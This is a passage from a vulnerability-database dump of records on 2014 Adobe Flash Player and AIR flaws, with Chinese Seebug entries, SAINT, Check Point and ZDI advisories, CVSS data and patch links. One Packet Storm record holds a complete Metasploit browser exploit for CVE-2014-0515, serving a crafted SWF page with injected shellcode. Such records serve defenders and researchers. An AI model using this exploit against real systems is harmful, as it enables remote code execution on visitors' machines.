CVE-2014-0499\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002Adobe AIR\u662f\u9488\u5bf9\u7f51\u7edc\u4e0e\u684c\u9762\u5e94\u7528\u7684\u7ed3\u5408\u6240\u5f00\u53d1\u51fa\u6765\u7684\u6280\u672f\uff0c\u53ef\u4ee5\u4e0d\u5fc5\u7ecf\u7531\u6d4f\u89c8\u5668\u800c\u5bf9\u7f51\u7edc\u4e0a\u7684\u4e91\u7aef\u7a0b\u5f0f\u505a\u63a7\u5236\u3002\r\n\r\nAdobe Flash Player\u53caAIR\u5728\u5904\u7406\u542b\u6709\u7279\u5236Flash\u5185\u5bb9\u7684\u6076\u610f\u7f51\u9875\u65f6\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u5305\u62ec\u6808\u6ea2\u51fa\u3001\u5185\u5b58\u6cc4\u9732\u3001\u53cc\u91cd\u91ca\u653e\u6f0f\u6d1e\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u6f0f\u6d1e\u83b7\u53d6\u654f\u611f\u4fe1\u606f\uff0c\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6700\u7ec8\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\r\n0\r\nAdobe Flash Player < 12.0.0.44\r\nAdobe Flash Player < 11.2.202.336\r\nAdobe AIR 4.0.0.1390\r\nAdobe AIR 3.9.0.1390 SDK\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\nAdobe\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08apsb14-07\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\napsb14-07\uff1aSecurity updates available for Adobe Flash Player\r\n\u94fe\u63a5\uff1ahttp://helpx.adobe.com/security/products/flash-player/apsb14-07.html", "cvss3": {}, "published": "2014-02-21T00:00:00", "title": "Adobe Flash Player\u53caAIR\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e(CVE-2014-0499)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0499"], "modified": "2014-02-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61525", "id": "SSV:61525", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:32:41", "description": "BUGTRAQ ID: 65702\r\nCVE(CAN) ID: 
CVE-2014-0502\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002Adobe AIR\u662f\u9488\u5bf9\u7f51\u7edc\u4e0e\u684c\u9762\u5e94\u7528\u7684\u7ed3\u5408\u6240\u5f00\u53d1\u51fa\u6765\u7684\u6280\u672f\uff0c\u53ef\u4ee5\u4e0d\u5fc5\u7ecf\u7531\u6d4f\u89c8\u5668\u800c\u5bf9\u7f51\u7edc\u4e0a\u7684\u4e91\u7aef\u7a0b\u5f0f\u505a\u63a7\u5236\u3002\r\n\r\nAdobe Flash Player\u53caAIR\u5728\u5904\u7406\u542b\u6709\u7279\u5236Flash\u5185\u5bb9\u7684\u6076\u610f\u7f51\u9875\u65f6\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u5305\u62ec\u6808\u6ea2\u51fa\u3001\u5185\u5b58\u6cc4\u9732\u3001\u53cc\u91cd\u91ca\u653e\u6f0f\u6d1e\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6700\u7ec8\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\r\n0\r\nAdobe Flash Player < 12.0.0.44\r\nAdobe Flash Player < 11.2.202.336\r\nAdobe AIR 4.0.0.1390\r\nAdobe AIR 3.9.0.1390 SDK\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\nAdobe\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08apsb14-07\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\napsb14-07\uff1aSecurity updates available for Adobe Flash Player\r\n\u94fe\u63a5\uff1ahttp://helpx.adobe.com/security/products/flash-player/apsb14-07.htm", "cvss3": {}, "published": "2014-02-21T00:00:00", "title": "Adobe Flash Player\u53caAIR\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2014-0502)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0502"], "modified": "2014-02-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61524", "id": "SSV:61524", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "description": "Added: 06/24/2014 \nCVE: 
[CVE-2014-0515](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0515>) \nBID: [67092](<http://www.securityfocus.com/bid/67092>) \nOSVDB: [106347](<http://www.osvdb.org/106347>) \n\n\n### Background\n\nThe [Adobe Flash](<http://www.adobe.com/ca/products/flash.html>) plugin provides flash content rendering for web browsers. \n\n### Problem\n\nA buffer overflow exists due to an error in processing SWF files. The vulnerable function exists in the DisplayShader class and can be exploited by setting a malicious Pixel Bender Filter. \n\n### Limitations\n\nThis exploit has been tested against IE 8.0 on Windows 7 SP1 and Adobe Flash 13.0.0.182 \n\n### Resolution\n\nUpdate the [Adobe Flash](<http://get.adobe.com/flashplayer/>) plugin. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-06-24T00:00:00", "type": "saint", "title": "Adobe Pixel Shader", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-06-24T00:00:00", "id": "SAINT:2A4112C17E5B168C185836416A370D6A", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_shader", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:26", "description": "Added: 06/24/2014 \nCVE: [CVE-2014-0515](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0515>) \nBID: [67092](<http://www.securityfocus.com/bid/67092>) \nOSVDB: [106347](<http://www.osvdb.org/106347>) \n\n\n### Background\n\nThe [Adobe Flash](<http://www.adobe.com/ca/products/flash.html>) plugin provides flash content rendering for web browsers. \n\n### Problem\n\nA buffer overflow exists due to an error in processing SWF files. The vulnerable function exists in the DisplayShader class and can be exploited by setting a malicious Pixel Bender Filter. 
\n\n### Limitations\n\nThis exploit has been tested against IE 8.0 on Windows 7 SP1 and Adobe Flash 13.0.0.182 \n\n### Resolution\n\nUpdate the [Adobe Flash](<http://get.adobe.com/flashplayer/>) plugin. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-06-24T00:00:00", "type": "saint", "title": "Adobe Pixel Shader", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-06-24T00:00:00", "id": "SAINT:C8CA9C3E5793B126645D3AAE09323B71", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_shader", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-15T23:25:25", "description": "Added: 06/24/2014 \nCVE: [CVE-2014-0515](<https://vulners.com/cve/CVE-2014-0515>) \nBID: [67092](<http://www.securityfocus.com/bid/67092>) \nOSVDB: [106347](<http://www.osvdb.org/106347>) \n\n\n### Background\n\nThe [Adobe Flash](<http://www.adobe.com/ca/products/flash.html>) plugin provides flash content rendering for web browsers. \n\n### Problem\n\nA buffer overflow exists due to an error in processing SWF files. The vulnerable function exists in the DisplayShader class and can be exploited by setting a malicious Pixel Bender Filter. \n\n### Limitations\n\nThis exploit has been tested against IE 8.0 on Windows 7 SP1 and Adobe Flash 13.0.0.182 \n\n### Resolution\n\nUpdate the [Adobe Flash](<http://get.adobe.com/flashplayer/>) plugin. 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-06-24T00:00:00", "type": "saint", "title": "Adobe Pixel Shader", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-06-24T00:00:00", "id": "SAINT:1F8BAA45932612426B30F937F135FF86", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/adobe_shader", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-27T12:38:26", "description": "Added: 06/24/2014 \nCVE: [CVE-2014-0515](<https://vulners.com/cve/CVE-2014-0515>) \nBID: [67092](<http://www.securityfocus.com/bid/67092>) \nOSVDB: [106347](<http://www.osvdb.org/106347>) \n\n\n### Background\n\nThe [Adobe Flash](<http://www.adobe.com/ca/products/flash.html>) plugin provides flash content rendering for web browsers. \n\n### Problem\n\nA buffer overflow exists due to an error in processing SWF files. The vulnerable function exists in the DisplayShader class and can be exploited by setting a malicious Pixel Bender Filter. \n\n### Limitations\n\nThis exploit has been tested against IE 8.0 on Windows 7 SP1 and Adobe Flash 13.0.0.182 \n\n### Resolution\n\nUpdate the [Adobe Flash](<http://get.adobe.com/flashplayer/>) plugin. 
\n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2014-06-24T00:00:00", "type": "saint", "title": "Adobe Pixel Shader", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-06-24T00:00:00", "id": "SAINT:75FA8A298976AF8ABCE837B2A3892867", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_shader", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:54", "description": "", "cvss3": {}, "published": "2014-05-09T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player Shader Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-05-09T00:00:00", "id": "PACKETSTORM:126560", "href": "https://packetstormsecurity.com/files/126560/Adobe-Flash-Player-Shader-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Adobe Flash Player Shader Buffer Overflow\", \n'Description' => %q{ \nThis module exploits a buffer overflow vulnerability in Adobe Flash Player. 
The \nvulnerability occurs in the flash.Display.Shader class, when setting specially \ncrafted data as its bytecode, as exploited in the wild in April 2014. This module \nhas been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over \nWindows XP SP3, Windows 7 SP1 and Windows 8. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery and exploit in the wild \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2014-0515'], \n['BID', '67092'], \n['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'], \n['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ] \n], \n'Payload' => \n{ \n'Space' => 2000, \n'DisableNops' => true, \n'PrependEncoder' => stack_adjust \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n'Retries' => false, \n'EXITFUNC' => \"thread\" \n}, \n'Platform' => 'win', \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:clsid => \"{D27CDB6E-AE6D-11cf-96B8-444553540000}\", \n:method => \"LoadMovie\", \n:os_name => Msf::OperatingSystems::WINDOWS, \n:ua_name => Msf::HttpClients::IE, \n:flash => lambda { |ver| ver =~ /^11\\./ || ver =~ /^12\\./ || (ver =~ /^13\\./ && ver <= '13.0.0.182') } \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Apr 28 2014\", \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef stack_adjust \nadjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb \nadjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit \nadjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit \nadjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset \n \nadjust \nend \n \ndef 
on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status(\"Sending SWF...\") \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status(\"Sending HTML...\") \ntag = retrieve_tag(cli, request) \nprofile = get_profile(tag) \nprofile[:tried] = false unless profile.nil? # to allow request the swf \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \nflash_payload = \"\" \nget_payload(cli,target_info).unpack(\"V*\").each do |i| \nflash_payload << \"0x#{i.to_s(16)},\" \nend \nflash_payload.gsub!(/,$/, \"\") \n \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=flash_payload%>\" /> \n<param name=\"Play\" value=\"true\" /> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0515\", \"Graph.swf\" ) \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126560/adobe_flash_pixel_bender_bof.rb.txt"}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:09:10", "description": "A memory corruption vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in Adobe Flash Player while parsing specially crafted SWF file. 
A remote attacker can exploit this issue by enticing a victim to open a specially crafted SWF file.", "cvss3": {}, "published": "2014-03-04T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Memory Corruption (APSB14-07: CVE-2014-0498)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498"], "modified": "2014-03-10T00:00:00", "id": "CPAI-2014-0974", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T06:41:06", "description": "A cross-site scripting vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in the way the browser and the plug-in handle specially crafted URLs. 
A remote attacker can exploit this vulnerability by enticing an affected user to open a malicious web-page.", "cvss3": {}, "published": "2014-04-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Cross-Site Scripting (APSB14-09: CVE-2014-0509)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0509"], "modified": "2014-04-17T00:00:00", "id": "CPAI-2014-1337", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-11-28T06:40:53", "description": "An arbitrary code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a buffer overflow while handling specially crafted SWF files. A remote attacker can exploit this vulnerability to execute arbitrary files on the victim's computer.", "cvss3": {}, "published": "2014-04-30T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Buffer Overflow Arbitrary Code Execution (CVE-2014-0515)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-29T00:00:00", "id": "CPAI-2014-1492", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T06:42:52", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a use-after-free error while loading specially crafted SWF files. 
A remote attacker can exploit this issue by enticing the victim to open a specially crafted SWF file.", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Use After Free Code Execution (APSB14-09: CVE-2014-0507)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0507"], "modified": "2014-04-10T00:00:00", "id": "CPAI-2014-1340", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:02:08", "description": "An information disclosure vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in the way Adobe Flash Player handles specially crafted SWF files. 
A remote attacker could exploit this vulnerability by enticing a user to open an HTML document containing an embedded malformed Flash file (SWF) with an affected product.", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Information Disclosure (APSB14-09: CVE-2014-0508)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0508"], "modified": "2014-04-16T00:00:00", "id": "CPAI-2014-1341", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:55:10", "description": "An information disclosure vulnerability has been reported in Adobe Flash Player. 
The vulnerability is due to an error in the way Adobe Flash Player handles specially crafted SWF files.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Information Disclosure (APSB14-08: CVE-2014-0504)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0504"], "modified": "2016-02-14T00:00:00", "id": "CPAI-2014-1146", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-11-28T06:42:57", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a use-after-free error while loading SWF files. A remote attacker can exploit this issue by enticing the victim to open a malicious web page.", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Use After Free Code Execution (APSB14-09; CVE-2014-0506)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0506"], "modified": "2014-04-09T00:00:00", "id": "CPAI-2014-1338", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:08:56", "description": "A security bypass vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in the way Adobe Flash Player handles URLs within HTML files. 
A remote attacker can exploit this issue by enticing a victim to open a specially crafted HTML file.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Same Origin Security Bypass (APSB14-08; CVE-2014-0503)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503"], "modified": "2014-03-16T00:00:00", "id": "CPAI-2014-1147", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-11-28T06:45:37", "description": "A memory corruption vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an error in Adobe Flash Player while parsing a specially crafted SWF file. 
A remote attacker can exploit this issue by enticing a victim to open a specially crafted SWF file.", "cvss3": {}, "published": "2014-03-04T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Memory Corruption (APSB14-07: CVE-2014-0499)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0499"], "modified": "2014-03-10T00:00:00", "id": "CPAI-2014-1054", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-11-28T06:51:28", "description": "A remote code execution vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a double-free condition when handling specially crafted SWF files. Successful exploitation would allow an attacker to take complete control of the affected system.", "cvss3": {}, "published": "2014-02-23T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Player Double Free Remote Code Execution (APSB14-07; CVE-2014-0502)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0502"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2014-0931", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T11:55:53", "description": "Infinity is a web exploit kit that operates by delivering a malicious payload to the victim's computer. Remote attackers can infect users with Infinity exploit kit by enticing them to visit a malicious web page. 
Infinity Exploit Kit installs payloads on infected computer, which could result in data leakage and remote code execution.", "cvss3": {}, "published": "2014-06-10T00:00:00", "type": "checkpoint_advisories", "title": "Infinity Exploit Kit Landing Page (CVE-2013-1347; CVE-2013-2423; CVE-2013-2465; CVE-2014-0322; CVE-2014-0502; CVE-2014-1776)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1347", "CVE-2013-2423", "CVE-2013-2465", "CVE-2014-0322", "CVE-2014-0502", "CVE-2014-1776"], "modified": "2015-07-16T00:00:00", "id": "CPAI-2014-1622", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2023-09-15T13:24:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the usage of regular expressions in ActionScript where an expression could overflow a data structure on the stack. 
An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2014-04-03T00:00:00", "type": "zdi", "title": "Adobe Flash Player RegExp Stack Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498"], "modified": "2014-04-03T00:00:00", "id": "ZDI-14-040", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-040/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-15T13:22:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the usage of regular expressions in ActionScript where an expression could overflow a data structure on the stack. 
